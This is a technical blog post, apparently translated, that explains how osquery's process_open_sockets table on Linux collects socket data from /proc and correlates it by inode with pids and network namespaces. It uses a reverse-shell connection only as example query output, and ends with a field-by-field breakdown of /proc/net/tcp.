Published by Spoock

Reading the osquery Source: Analyzing process_open_sockets

Overview

The previous article analyzed the implementation of shell_history and showed how osquery's clean design keeps the source simple and readable. shell_history itself is fairly straightforward: it reads and parses .bash_history to recover the commands a user has typed. This article analyzes process_open_sockets, whose implementation is considerably more complex and requires a deeper understanding of Linux.

Usage

First, look at the definition of the process_open_sockets table:

table_name("process_open_sockets")
description("Processes which have open network sockets on the system.")
schema([
    Column("pid", INTEGER, "Process (or thread) ID", index=True),
    Column("fd", BIGINT, "Socket file descriptor number"),
    Column("socket", BIGINT, "Socket handle or inode number"),
    Column("family", INTEGER, "Network protocol (IPv4, IPv6)"),
    Column("protocol", INTEGER, "Transport protocol (TCP/UDP)"),
    Column("local_address", TEXT, "Socket local address"),
    Column("remote_address", TEXT, "Socket remote address"),
    Column("local_port", INTEGER, "Socket local port"),
    Column("remote_port", INTEGER, "Socket remote port"),
    Column("path", TEXT, "For UNIX sockets (family=AF_UNIX), the domain path"),
])
extended_schema(lambda: LINUX() or DARWIN(), [
    Column("state", TEXT, "TCP socket state"),
])
extended_schema(LINUX, [
    Column("net_namespace", TEXT, "The inode number of the network namespace"),
])
implementation("system/process_open_sockets@genOpenSockets")
examples([
  "select * from process_open_sockets where pid = 1",
])

A few of the columns deserve explanation:


  • fd: the file descriptor number
  • socket: the inode number of the socket used for the network connection
  • family: the address family (IPv4/IPv6), reported as a number
  • protocol: the transport protocol (TCP/UDP), also reported as a number
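
On Linux these numbers come straight from the socket headers. As a quick sketch (familyName and protocolName are illustrative helpers, not osquery code), the raw values map back to names like this:

```cpp
#include <netinet/in.h> // IPPROTO_TCP, IPPROTO_UDP
#include <string>
#include <sys/socket.h> // AF_INET, AF_INET6, AF_UNIX

// Map the raw number stored in the family column back to a name.
// On Linux, AF_INET is 2 and AF_INET6 is 10.
std::string familyName(int family) {
  switch (family) {
    case AF_INET:  return "IPv4";
    case AF_INET6: return "IPv6";
    case AF_UNIX:  return "UNIX";
    default:       return "other";
  }
}

// Likewise for the protocol column: IPPROTO_TCP is 6, IPPROTO_UDP is 17.
std::string protocolName(int protocol) {
  switch (protocol) {
    case IPPROTO_TCP: return "TCP";
    case IPPROTO_UDP: return "UDP";
    default:          return "other";
  }
}
```

So the family=2, protocol=6 rows in the queries below are IPv4 TCP sockets.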

Let's set up a simple reverse shell and then query the process_open_sockets table:

osquery> select pos.*,p.cwd,p.cmdline from process_open_sockets pos left join processes p where pos.family=2 and pos.pid=p.pid and net_namespace<>0;
+-------+----+----------+--------+----------+---------------+----------------+------------+-------------+------+-------------+---------------+-----------------+-----------+
| pid   | fd | socket   | family | protocol | local_address | remote_address | local_port | remote_port | path | state       | net_namespace | cwd             | cmdline   |
+-------+----+----------+--------+----------+---------------+----------------+------------+-------------+------+-------------+---------------+-----------------+-----------+
| 37272 | 15 | 52319299 | 2      | 6        | 192.168.2.142 | 172.22.0.176   | 43522      | 9091        |      | ESTABLISHED | 4026531956    | /home/xingjun   | osqueryi  |
| 91155 | 2  | 56651533 | 2      | 6        | 192.168.2.142 | 192.168.2.150  | 53486      | 8888        |      | ESTABLISHED | 4026531956    | /proc/79036/net | /bin/bash |
+-------+----+----------+--------+----------+---------------+----------------+------------+-------------+------+-------------+---------------+-----------------+-----------+

The table is implemented in osquery/tables/networking/linux/process_open_sockets.cpp.

Analysis

The entire implementation of process_open_sockets lives in a single function, QueryData genOpenSockets(QueryContext &context).

The official source comments describe the approach as follows:

Data for this table is fetched from 3 different sources and correlated.

1.Collect all sockets associated with each pid by going through all files under /proc/<pid>/fd and search for links of the type socket:[<inode>]. Extract the inode and fd (filename) and index it by inode number. The inode can then be used to correlate pid and fd with the socket information collected on step 3. The map generated in this step will only contain sockets associated with pids in the list, so it will also be used to filter the sockets later if pid_filter is set.

2.Collect the inode for the network namespace associated with each pid. Every time a new namespace is found execute step 3 to get socket basic information.

3.Collect basic socket information for all sockets under a specific network namespace. This is done by reading through files under /proc/<pid>/net for the first pid we find in a certain namespace. Notice this will collect information for all sockets on the namespace not only for sockets associated with the specific pid, therefore only needs to be run once. From this step we collect the inodes of each of the sockets, and will use that to correlate the socket information with the information collected in steps 1 and 2.

In short, the steps are:

  1. Collect each process's fd information, in particular the socket inodes;
  2. Collect each process's network namespace inode;
  3. Read /proc/<pid>/net and match its entries against the socket inodes from step 1 to find the network connections belonging to each pid.
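
The correlation these steps build up to can be sketched with simplified stand-in types (ProcessInfo, Socket, and correlate below are hypothetical, not osquery's actual types):

```cpp
#include <map>
#include <string>
#include <utility>
#include <vector>

// Step 1 output: socket inode -> {pid, fd}, built from /proc/<pid>/fd links.
struct ProcessInfo { std::string pid, fd; };
using InodeMap = std::map<std::string, ProcessInfo>;

// Step 3 output: one entry per socket parsed from /proc/<pid>/net/*.
struct Socket { std::string inode, local, remote; };

// Correlate: keep only sockets whose inode appeared in some pid's fd table.
std::vector<std::pair<ProcessInfo, Socket>>
correlate(const InodeMap& inodes, const std::vector<Socket>& sockets) {
  std::vector<std::pair<ProcessInfo, Socket>> out;
  for (const auto& s : sockets) {
    auto it = inodes.find(s.inode);
    if (it != inodes.end()) {
      out.push_back({it->second, s});
    }
  }
  return out;
}
```

The rest of the article walks through how osquery fills in each side of this lookup.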

For clarity, I have split the function into pieces and will walk through them step by step.

Obtaining the pid list

std::set <std::string> pids;
if (context.constraints["pid"].exists(EQUALS)) {
    pids = context.constraints["pid"].getAll(EQUALS);
}

bool pid_filter = !(pids.empty() ||
                    std::find(pids.begin(), pids.end(), "-1") != pids.end());

if (!pid_filter) {
    pids.clear();
    status = osquery::procProcesses(pids);
    if (!status.ok()) {
        VLOG(1) << "Failed to acquire pid list: " << status.what();
        return results;
    }
}

  • The context.constraints["pid"].exists(EQUALS) check and pid_filter determine whether the SQL statement carries a WHERE clause on pid; if so, only the requested pids are queried.
  • Otherwise, status = osquery::procProcesses(pids); enumerates every pid on the system.

Following the call into osquery/filesystem/linux/proc.cpp:procProcesses(std::set<std::string>& processes):

Status procProcesses(std::set<std::string>& processes) {
  auto callback = [](const std::string& pid,
                     std::set<std::string>& _processes) -> bool {
    _processes.insert(pid);
    return true;
  };

  return procEnumerateProcesses<decltype(processes)>(processes, callback);
}

This in turn calls osquery/filesystem/linux/proc.h:procEnumerateProcesses(UserData& user_data, bool (*callback)(const std::string&, UserData&)):

const std::string kLinuxProcPath = "/proc";
.....
template<typename UserData>
Status procEnumerateProcesses(UserData &user_data,bool (*callback)(const std::string &, UserData &)) {
    boost::filesystem::directory_iterator it(kLinuxProcPath), end;

    try {
        for (; it != end; ++it) {
            if (!boost::filesystem::is_directory(it->status())) {
                continue;
            }

            // See #792: std::regex is incomplete until GCC 4.9
            const auto &pid = it->path().leaf().string();
            if (std::atoll(pid.data()) <= 0) {
                continue;
            }

            bool ret = callback(pid, user_data);
            if (ret == false) {
                break;
            }
        }
    } catch (const boost::filesystem::filesystem_error &e) {
        VLOG(1) << "Exception iterating Linux processes: " << e.what();
        return Status(1, e.what());
    }

    return Status(0);
}

  • boost::filesystem::directory_iterator it(kLinuxProcPath), end; iterates over every entry under /proc.
  • const auto &pid = it->path().leaf().string(); takes the directory name, and std::atoll checks that it is a positive number (i.e. a pid); if so, bool ret = callback(pid, user_data); is invoked.
  • The callback simply does _processes.insert(pid); return true;, recording every pid found into user_data.
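
The numeric-name filter can be reproduced in isolation (looksLikePid is a hypothetical helper mirroring the std::atoll check above):

```cpp
#include <cstdlib>
#include <string>

// The same test procEnumerateProcesses uses to keep only pid directories:
// std::atoll returns 0 for names such as "self" or "net", while real pids
// are always positive integers.
bool looksLikePid(const std::string& name) {
  return std::atoll(name.c_str()) > 0;
}
```

This is why entries like /proc/self or /proc/net are skipped while /proc/14960 is kept.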

Using a reverse shell as the running example, osqueryi reports:

osquery> select * from process_open_sockets where pid=14960; 
+-------+----+--------+--------+----------+---------------+----------------+------------+-------------+------+-------------+---------------+
| pid   | fd | socket | family | protocol | local_address | remote_address | local_port | remote_port | path | state       | net_namespace |
+-------+----+--------+--------+----------+---------------+----------------+------------+-------------+------+-------------+---------------+
| 14960 | 2  | 307410 | 2      | 6        | 192.168.2.156 | 192.168.2.145  | 51118      | 8888        |      | ESTABLISHED | 4026531956    |
+-------+----+--------+--------+----------+---------------+----------------+------------+-------------+------+-------------+---------------+

Mapping socket inodes to pid and fd

/* Use a set to record the namespaces already processed */
std::set <ino_t> netns_list;
SocketInodeToProcessInfoMap inode_proc_map;
SocketInfoList socket_list;
for (const auto &pid : pids) {
    /* Step 1 */
    status = procGetSocketInodeToProcessInfoMap(pid, inode_proc_map);
    if (!status.ok()) {
        VLOG(1) << "Results for process_open_sockets might be incomplete. Failed "
                    "to acquire socket inode to process map for pid "
                << pid << ": " << status.what();
    }

Once all the pids to query have been collected, status = procGetSocketInodeToProcessInfoMap(pid, inode_proc_map); is called; as the name suggests, it collects the socket inode numbers belonging to each process. Its implementation is in osquery/filesystem/linux/proc.cpp:procGetSocketInodeToProcessInfoMap():

Status procGetSocketInodeToProcessInfoMap(const std::string &pid,SocketInodeToProcessInfoMap &result) {
    auto callback = [](const std::string &_pid,
                        const std::string &fd,
                        const std::string &link,
                        SocketInodeToProcessInfoMap &_result) -> bool {
        /* We only care about sockets. But there will be other descriptors. */
        if (link.find("socket:[") != 0) {
            return true;
        }

        std::string inode = link.substr(8, link.size() - 9);
        _result[inode] = {_pid, fd};
        return true;
    };

    return procEnumerateProcessDescriptors<decltype(result)>(
            pid, result, callback);
}

The auto callback here defines a callback function; let's step into procEnumerateProcessDescriptors():

const std::string kLinuxProcPath = "/proc";
....
template<typename UserData>
Status procEnumerateProcessDescriptors(const std::string &pid,
                                        UserData &user_data,
                                        bool (*callback)(const std::string &pid,
                                                        const std::string &fd,
                                                        const std::string &link,
                                                        UserData &user_data)) {
    std::string descriptors_path = kLinuxProcPath + "/" + pid + "/fd";

    try {
        boost::filesystem::directory_iterator it(descriptors_path), end;

        for (; it != end; ++it) {
            auto fd = it->path().leaf().string();

            std::string link;
            Status status = procReadDescriptor(pid, fd, link);
            if (!status.ok()) {
                VLOG(1) << "Failed to read the link for file descriptor " << fd
                        << " of pid " << pid << ". Data might be incomplete.";
            }

            bool ret = callback(pid, fd, link, user_data);
            if (ret == false) {
                break;
            }
        }
    } catch (boost::filesystem::filesystem_error &e) {
        VLOG(1) << "Exception iterating process file descriptors: " << e.what();
        return Status(1, e.what());
    }

    return Status(0);
}

This code is very clear:

1. Iterate over /proc/<pid>/fd to collect all of the process's file descriptors; in our example, /proc/14960/fd.


2. Invoke the callback, bool ret = callback(pid, fd, link, user_data);, i.e. the one defined earlier in procGetSocketInodeToProcessInfoMap:

auto callback = [](const std::string &_pid,
                    const std::string &fd,
                    const std::string &link,
                    SocketInodeToProcessInfoMap &_result) -> bool {
    /* We only care about sockets. But there will be other descriptors. */
    if (link.find("socket:[") != 0) {
        return true;
    }

    std::string inode = link.substr(8, link.size() - 9);
    _result[inode] = {_pid, fd};
    return true;
};

The code is simple: take the link target of each fd and check whether it starts with socket:[; if it does, extract the inode. Since we are building process_open_sockets, only descriptors that are sockets matter; in our example the inode is 307410. The resulting entry in SocketInodeToProcessInfoMap is _result[inode] = {_pid, fd};: the inode is the key, and the value carries the pid and fd.
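The extraction can be reproduced on its own (socketInodeFromLink is a hypothetical helper mirroring the callback's substr arithmetic):

```cpp
#include <string>

// Given the target of a /proc/<pid>/fd/<fd> symlink, return the socket
// inode, or an empty string for non-socket descriptors. Mirrors the
// callback's substr(8, size - 9): 8 skips "socket:[" and the extra 1
// drops the trailing "]".
std::string socketInodeFromLink(const std::string& link) {
  if (link.find("socket:[") != 0) {
    return "";
  }
  return link.substr(8, link.size() - 9);
}
```

For the link "socket:[307410]" this yields "307410", the key later looked up in inode_proc_map.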

Obtaining each process's namespace inode

After status = procGetSocketInodeToProcessInfoMap(pid, inode_proc_map); finishes, we have _result[inode] = {_pid, fd};, associating each inode with a pid and fd. The next step is to resolve each process's network namespace.

ino_t ns;
ProcessNamespaceList namespaces;
status = procGetProcessNamespaces(pid, namespaces, {"net"});
if (status.ok()) {
    ns = namespaces["net"];
} else {
    /* If namespaces are not available we allways set ns to 0 and step 3 will
        * run once for the first pid in the list.
        */
    ns = 0;
    VLOG(1) << "Results for the process_open_sockets might be incomplete."
                "Failed to acquire network namespace information for process "
                "with pid "
            << pid << ": " << status.what();
}

Following status = procGetProcessNamespaces(pid, namespaces, {"net"}); leads into osquery/filesystem/linux/proc.cpp:procGetProcessNamespaces():

const std::string kLinuxProcPath = "/proc";
...
Status procGetProcessNamespaces(const std::string &process_id,ProcessNamespaceList &namespace_list,std::vector <std::string> namespaces) {
    namespace_list.clear();
    if (namespaces.empty()) {
        namespaces = kUserNamespaceList;
    }
    auto process_namespace_root = kLinuxProcPath + "/" + process_id + "/ns";
    for (const auto &namespace_name : namespaces) {
        ino_t namespace_inode;
        auto status = procGetNamespaceInode(namespace_inode, namespace_name, process_namespace_root);
        if (!status.ok()) {
            continue;
        }
        namespace_list[namespace_name] = namespace_inode;
    }
    return Status(0, "OK");
}

The function loops over const auto &namespace_name : namespaces and calls procGetNamespaceInode(namespace_inode, namespace_name, process_namespace_root); for each one. In our example namespaces is {"net"} and process_namespace_root is /proc/14960/ns.

Looking at procGetNamespaceInode(namespace_inode, namespace_name, process_namespace_root):

Status procGetNamespaceInode(ino_t &inode,const std::string &namespace_name,const std::string &process_namespace_root) {
    inode = 0;
    auto path = process_namespace_root + "/" + namespace_name;
    char link_destination[PATH_MAX] = {};
    auto link_dest_length = readlink(path.data(), link_destination, PATH_MAX - 1);
    if (link_dest_length < 0) {
        return Status(1, "Failed to retrieve the inode for namespace " + path);
    }

    // The link destination must be in the following form: namespace:[inode]
    if (std::strncmp(link_destination,
                        namespace_name.data(),
                        namespace_name.size()) != 0 ||
        std::strncmp(link_destination + namespace_name.size(), ":[", 2) != 0) {
        return Status(1, "Invalid descriptor for namespace " + path);
    }

    // Parse the inode part of the string; strtoull should return us a pointer
    // to the closing square bracket
    const char *inode_string_ptr = link_destination + namespace_name.size() + 2;
    char *square_bracket_ptr = nullptr;

    inode = static_cast<ino_t>(
            std::strtoull(inode_string_ptr, &square_bracket_ptr, 10));
    if (inode == 0 || square_bracket_ptr == nullptr ||
        *square_bracket_ptr != ']') {
        return Status(1, "Invalid inode value in descriptor for namespace " + path);
    }

    return Status(0, "OK");
}

With the variables set up in procGetProcessNamespaces(), path is /proc/<pid>/ns/net, here /proc/14960/ns/net. The line inode = static_cast<ino_t>(std::strtoull(inode_string_ptr, &square_bracket_ptr, 10)); parses the inode out of that symlink's target, which has the form net:[inode].


So the inode obtained here is 4026531956. Back in procGetProcessNamespaces(), namespace_list[namespace_name] = namespace_inode; sets namespace_list['net']=4026531956, and finally ns = namespaces["net"]; yields ns=4026531956.
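The link parsing can be sketched in isolation (namespaceInode is an illustrative helper following the same prefix-check-plus-strtoull approach as procGetNamespaceInode):

```cpp
#include <cstdlib>
#include <string>

// Parse the inode out of a namespace link target such as "net:[4026531956]".
// Returns 0 on malformed input, matching the error cases checked by
// procGetNamespaceInode (wrong prefix, missing ":[", missing "]").
unsigned long long namespaceInode(const std::string& link,
                                  const std::string& ns_name) {
  if (link.compare(0, ns_name.size(), ns_name) != 0 ||
      link.compare(ns_name.size(), 2, ":[") != 0) {
    return 0;
  }
  char* end = nullptr;
  auto inode = std::strtoull(link.c_str() + ns_name.size() + 2, &end, 10);
  if (end == nullptr || *end != ']') {
    return 0;
  }
  return inode;
}
```

Feeding it the link target from our example returns 4026531956.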

Parsing the process's net information

// Linux proc protocol define to net stats file name.
const std::map<int, std::string> kLinuxProtocolNames = {
        {IPPROTO_ICMP,    "icmp"},
        {IPPROTO_TCP,     "tcp"},
        {IPPROTO_UDP,     "udp"},
        {IPPROTO_UDPLITE, "udplite"},
        {IPPROTO_RAW,     "raw"},
};
...
if (netns_list.count(ns) == 0) {
    netns_list.insert(ns);

    /* Step 3 */
    for (const auto &pair : kLinuxProtocolNames) {
        status = procGetSocketList(AF_INET, pair.first, ns, pid, socket_list);
        if (!status.ok()) {
            VLOG(1)
                    << "Results for process_open_sockets might be incomplete. Failed "
                        "to acquire basic socket information for AF_INET "
                    << pair.second << ": " << status.what();
        }

        status = procGetSocketList(AF_INET6, pair.first, ns, pid, socket_list);
        if (!status.ok()) {
            VLOG(1)
                    << "Results for process_open_sockets might be incomplete. Failed "
                        "to acquire basic socket information for AF_INET6 "
                    << pair.second << ": " << status.what();
        }
    }
    status = procGetSocketList(AF_UNIX, IPPROTO_IP, ns, pid, socket_list);
    if (!status.ok()) {
        VLOG(1)
                << "Results for process_open_sockets might be incomplete. Failed "
                    "to acquire basic socket information for AF_UNIX: "
                << status.what();
    }
}

For each of icmp/tcp/udp/udplite/raw, procGetSocketList() is called for AF_INET and AF_INET6, plus once more for AF_UNIX with IPPROTO_IP. We will follow procGetSocketList(AF_INET, pair.first, ns, pid, socket_list); here (where ns is 4026531956).

Status procGetSocketList(int family, int protocol,ino_t net_ns,const std::string &pid, SocketInfoList &result) {
    std::string path = kLinuxProcPath + "/" + pid + "/net/";

    switch (family) {
        case AF_INET:
            if (kLinuxProtocolNames.count(protocol) == 0) {
                return Status(1,"Invalid family " + std::to_string(protocol) +" for AF_INET familiy");
            } else {
                path += kLinuxProtocolNames.at(protocol);
            }
            break;

        case AF_INET6:
            if (kLinuxProtocolNames.count(protocol) == 0) {
                return Status(1,"Invalid protocol " + std::to_string(protocol) +" for AF_INET6 familiy");
            } else {
                path += kLinuxProtocolNames.at(protocol) + "6";
            }
            break;

        case AF_UNIX:
            if (protocol != IPPROTO_IP) {
                return Status(1,
                                "Invalid protocol " + std::to_string(protocol) +
                                " for AF_UNIX familiy");
            } else {
                path += "unix";
            }

            break;

        default:
            return Status(1, "Invalid family " + std::to_string(family));
    }

    std::string content;
    if (!osquery::readFile(path, content).ok()) {
        return Status(1, "Could not open socket information from " + path);
    }

    Status status(0);
    switch (family) {
        case AF_INET:
        case AF_INET6:
            status = procGetSocketListInet(family, protocol, net_ns, path, content, result);
            break;

        case AF_UNIX:
            status = procGetSocketListUnix(net_ns, path, content, result);
            break;
    }

    return status;
}

Since the arguments are family=AF_INET, protocol=tcp, net_ns=4026531956, pid=14960, execution proceeds as follows:

1. path += kLinuxProtocolNames.at(protocol); makes path /proc/14960/net/tcp.

2. osquery::readFile(path, content).ok() reads that file's contents, which in our example are:

sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
0: 00000000:1538 00000000:0000 0A 00000000:00000000 00:00000000 00000000    26        0 26488 1 ffff912c69c21740 100 0 0 10 0
1: 0100007F:0019 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 28721 1 ffff912c69c23640 100 0 0 10 0
2: 00000000:01BB 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 27739 1 ffff912c69c21f00 100 0 0 10 0
3: 0100007F:18EB 00000000:0000 0A 00000000:00000000 00:00000000 00000000   988        0 25611 1 ffff912c69c207c0 100 0 0 10 0
4: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 27737 1 ffff912c69c226c0 100 0 0 10 0
5: 017AA8C0:0035 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 29031 1 ffff912c69c23e00 100 0 0 10 0
6: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 25754 1 ffff912c69c20f80 100 0 0 10 0
7: 0100007F:0277 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 25590 1 ffff912c69c20000 100 0 0 10 0
8: 9C02A8C0:C7AE 9102A8C0:22B8 01 00000000:00000000 00:00000000 00000000  1000

3. Call procGetSocketListInet(family, protocol, net_ns, path, content, result);.

Inside procGetSocketListInet

static Status procGetSocketListInet(int family,int protocol,ino_t net_ns,const std::string &path,const std::string &content,SocketInfoList &result) {
    // The system's socket information is tokenized by line.
    bool header = true;
    for (const auto &line : osquery::split(content, "\n")) {
        if (header) {
            if (line.find("sl") != 0 && line.find("sk") != 0) {
                return Status(1, std::string("Invalid file header for ") + path);
            }
            header = false;
            continue;
        }

        // The socket information is tokenized by spaces, each a field.
        auto fields = osquery::split(line, " ");
        if (fields.size() < 10) {
            VLOG(1) << "Invalid socket descriptor found: '" << line
                    << "'. Skipping this entry";
            continue;
        }

        // Two of the fields are the local/remote address/port pairs.
        auto locals = osquery::split(fields[1], ":");
        auto remotes = osquery::split(fields[2], ":");

        if (locals.size() != 2 || remotes.size() != 2) {
            VLOG(1) << "Invalid socket descriptor found: '" << line
                    << "'. Skipping this entry";
            continue;
        }

        SocketInfo socket_info = {};
        socket_info.socket = fields[9];
        socket_info.net_ns = net_ns;
        socket_info.family = family;
        socket_info.protocol = protocol;
        socket_info.local_address = procDecodeAddressFromHex(locals[0], family);
        socket_info.local_port = procDecodePortFromHex(locals[1]);
        socket_info.remote_address = procDecodeAddressFromHex(remotes[0], family);
        socket_info.remote_port = procDecodePortFromHex(remotes[1]);

        if (protocol == IPPROTO_TCP) {
            char *null_terminator_ptr = nullptr;
            auto integer_socket_state =
                    std::strtoull(fields[3].data(), &null_terminator_ptr, 16);
            if (integer_socket_state == 0 ||
                integer_socket_state >= tcp_states.size() ||
                null_terminator_ptr == nullptr || *null_terminator_ptr != 0) {
                socket_info.state = "UNKNOWN";
            } else {
                socket_info.state = tcp_states[integer_socket_state];
            }
        }

        result.push_back(std::move(socket_info));
    }

    return Status(0);
}

The flow is:

1. const auto &line : osquery::split(content, "\n") iterates over each line of the file, and auto fields = osquery::split(line, " "); tokenizes each line on spaces;

2. Each line is then parsed into a SocketInfo structure:

SocketInfo socket_info = {};
socket_info.socket = fields[9];
socket_info.net_ns = net_ns;
socket_info.family = family;
socket_info.protocol = protocol;
socket_info.local_address = procDecodeAddressFromHex(locals[0], family);
socket_info.local_port = procDecodePortFromHex(locals[1]);
socket_info.remote_address = procDecodeAddressFromHex(remotes[0], family);
socket_info.remote_port = procDecodePortFromHex(remotes[1]);

Each row of /proc/14960/net/tcp is parsed and filled into a socket_info structure. But not every row of /proc/14960/net/tcp concerns our process, so the entries still need to be filtered: only the last row, with inode 307410, is the one we want.
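The tokenization step can be sketched as follows (splitFields is a stand-in for osquery::split, which collapses runs of spaces so that fields[1]/fields[2] are the address pairs and fields[9] is the socket inode):

```cpp
#include <sstream>
#include <string>
#include <vector>

// Split a /proc/net/tcp row on whitespace, collapsing repeated spaces the
// way osquery::split does. istream extraction skips whitespace runs, so
// the column-aligned padding in the file does not produce empty tokens.
std::vector<std::string> splitFields(const std::string& line) {
  std::istringstream in(line);
  std::vector<std::string> fields;
  for (std::string tok; in >> tok;) {
    fields.push_back(tok);
  }
  return fields;
}
```

Applied to the sample row starting with 8: 9C02A8C0:C7AE, fields[1] is the local address pair, fields[3] the state, and fields[9] the inode 307410.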

Correlating sockets with processes

After /proc/14960/net/tcp has been parsed into socket_list, execution continues in genOpenSockets():

for (const auto &info : socket_list) {
    Row r;
    auto proc_it = inode_proc_map.find(info.socket);
    if (proc_it != inode_proc_map.end()) {
        r["pid"] = proc_it->second.pid;
        r["fd"] = proc_it->second.fd;
    } else if (!pid_filter) {
        r["pid"] = "-1";
        r["fd"] = "-1";
    } else {
        /* If we're filtering by pid we only care about sockets associated with
            * pids on the list.*/
        continue;
    }

    r["socket"] = info.socket;
    r["family"] = std::to_string(info.family);
    r["protocol"] = std::to_string(info.protocol);
    r["local_address"] = info.local_address;
    r["local_port"] = std::to_string(info.local_port);
    r["remote_address"] = info.remote_address;
    r["remote_port"] = std::to_string(info.remote_port);
    r["path"] = info.unix_socket_path;
    r["state"] = info.state;
    r["net_namespace"] = std::to_string(info.net_ns);

    results.push_back(std::move(r));
}

The key lines are:

auto proc_it = inode_proc_map.find(info.socket);
if (proc_it != inode_proc_map.end()) {

Iterating over socket_list, we look up each socket's inode (info.socket) in the inode_proc_map built in step 1. A hit means this socket belongs to one of the processes we care about, so its row is saved via results.push_back(std::move(r));.
At this point we have all of the process's network connections, which osquery then renders:

osquery> select * from process_open_sockets where pid=14960; 
+-------+----+--------+--------+----------+---------------+----------------+------------+-------------+------+-------------+---------------+
| pid   | fd | socket | family | protocol | local_address | remote_address | local_port | remote_port | path | state       | net_namespace |
+-------+----+--------+--------+----------+---------------+----------------+------------+-------------+------+-------------+---------------+
| 14960 | 2  | 307410 | 2      | 6        | 192.168.2.156 | 192.168.2.145  | 51118      | 8888        |      | ESTABLISHED | 4026531956    |
+-------+----+--------+--------+----------+---------------+----------------+------------+-------------+------+-------------+---------------+

That is the full flow of a process_open_sockets query in osquery.

Further exploration

Linux's "everything is a file" philosophy means we can obtain system and process information simply by reading certain files. So far we have looked at things purely from osquery's perspective; this section examines the network- and process-related information in /proc directly.

/proc/net/tcp and /proc/net/udp list every TCP/UDP socket visible in the current network namespace; for a process in the same namespace, their contents are identical to /proc/<pid>/net/tcp and /proc/<pid>/net/udp.

/proc/net/tcp looks like this:

sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
0: 00000000:1538 00000000:0000 0A 00000000:00000000 00:00000000 00000000    26        0 26488 1 ffff912c69c21740 100 0 0 10 0
1: 0100007F:0019 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 28721 1 ffff912c69c23640 100 0 0 10 0
2: 00000000:01BB 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 27739 1 ffff912c69c21f00 100 0 0 10 0
3: 00000000:1F40 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 471681 1 ffff912c37488f80 100 0 0 10 0
4: 0100007F:18EB 00000000:0000 0A 00000000:00000000 00:00000000 00000000   988        0 25611 1 ffff912c69c207c0 100 0 0 10 0
5: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 27737 1 ffff912c69c226c0 100 0 0 10 0
6: 017AA8C0:0035 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 29031 1 ffff912c69c23e00 100 0 0 10 0
7: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 25754 1 ffff912c69c20f80 100 0 0 10 0
8: 0100007F:0277 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 25590 1 ffff912c69c20000 100 0 0 10 0
9: 9C02A8C0:C7AE 9102A8C0:22B8 01 00000000:00000000 00:00000000 00000000  1000        0 307410 1 ffff912c374887c0 20 0 0 10 -1

/proc/14960/net/tcp looks like this:

sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
0: 00000000:1538 00000000:0000 0A 00000000:00000000 00:00000000 00000000    26        0 26488 1 ffff912c69c21740 100 0 0 10 0
1: 0100007F:0019 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 28721 1 ffff912c69c23640 100 0 0 10 0
2: 00000000:01BB 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 27739 1 ffff912c69c21f00 100 0 0 10 0
3: 0100007F:18EB 00000000:0000 0A 00000000:00000000 00:00000000 00000000   988        0 25611 1 ffff912c69c207c0 100 0 0 10 0
4: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 27737 1 ffff912c69c226c0 100 0 0 10 0
5: 017AA8C0:0035 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 29031 1 ffff912c69c23e00 100 0 0 10 0
6: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 25754 1 ffff912c69c20f80 100 0 0 10 0
7: 0100007F:0277 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 25590 1 ffff912c69c20000 100 0 0 10 0
8: 9C02A8C0:C7AE 9102A8C0:22B8 01 00000000:00000000 00:00000000 00000000  1000        0 307410 1 ffff912c374887c0 20 0 0 10 -1

The meaning of each column is fixed. Let's take the last row, 9C02A8C0:C7AE 9102A8C0:22B8 01 00000000:00000000 00:00000000 00000000 1000 0 307410 1 ffff912c374887c0 20 0 0 10 -1, as an example.

1. local_address: the local IP and port, here 9C02A8C0:C7AE. 9C02A8C0 is the local IP in hex (2617419968 in decimal). Read big-endian it would be 156.2.168.192, but the kernel prints the address in little-endian byte order, so reversing the bytes gives the real address, 192.168.2.156. C7AE in decimal is 51118. So the local endpoint of this connection is 192.168.2.156:51118.

2. rem_address: the remote IP and port, here 9102A8C0:22B8. Decoding 9102A8C0 the same way as local_address gives the remote IP 192.168.2.145, and 22B8 is port 8888.

3. st: the socket state, here 01. The possible values are:

  • 01: ESTABLISHED
  • 02: SYN_SENT
  • 03: SYN_RECV
  • 04: FIN_WAIT1
  • 05: FIN_WAIT2
  • 06: TIME_WAIT
  • 07: CLOSE
  • 08: CLOSE_WAIT
  • 09: LAST_ACK
  • 0A: LISTEN
  • 0B: CLOSING

So 01 in our example means the socket is in the ESTABLISHED state.

4. tx_queue: the length of the send queue, here 00000000.

5. rx_queue: for ESTABLISHED, the length of the receive queue; for LISTEN, the length of the completed-connection queue.

6. tr: the timer type. 0 means no timer is running; 1 the retransmission timer; 2 the connection timer; 3 the TIME_WAIT timer; 4 the persist timer.

7. tm->when: the timeout.

8. retrnsmt: the number of timeout retransmissions.

9. uid: the user id.

10. timeout: the number of unacknowledged TCP segments sent periodically by the persist or keepalive timer, cleared once an ACK is received.

11. inode: the inode of the socket.

12. 1 (no header shown): the socket's reference count.

13. ffff912c374887c0 (no header shown): the address of the corresponding sock structure.

14. 20 (no header shown): the RTO, in units of clock_t.

15. 0: an estimate used to compute delayed-ACK timing.

16. 0: the bitwise OR of the pending quick-ack count and the quick-ack-enabled flag.

17. 10: the current congestion window size.

18. -1: shown as -1 when the slow-start threshold is >= 0x7fffffff, otherwise the slow-start threshold itself.
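
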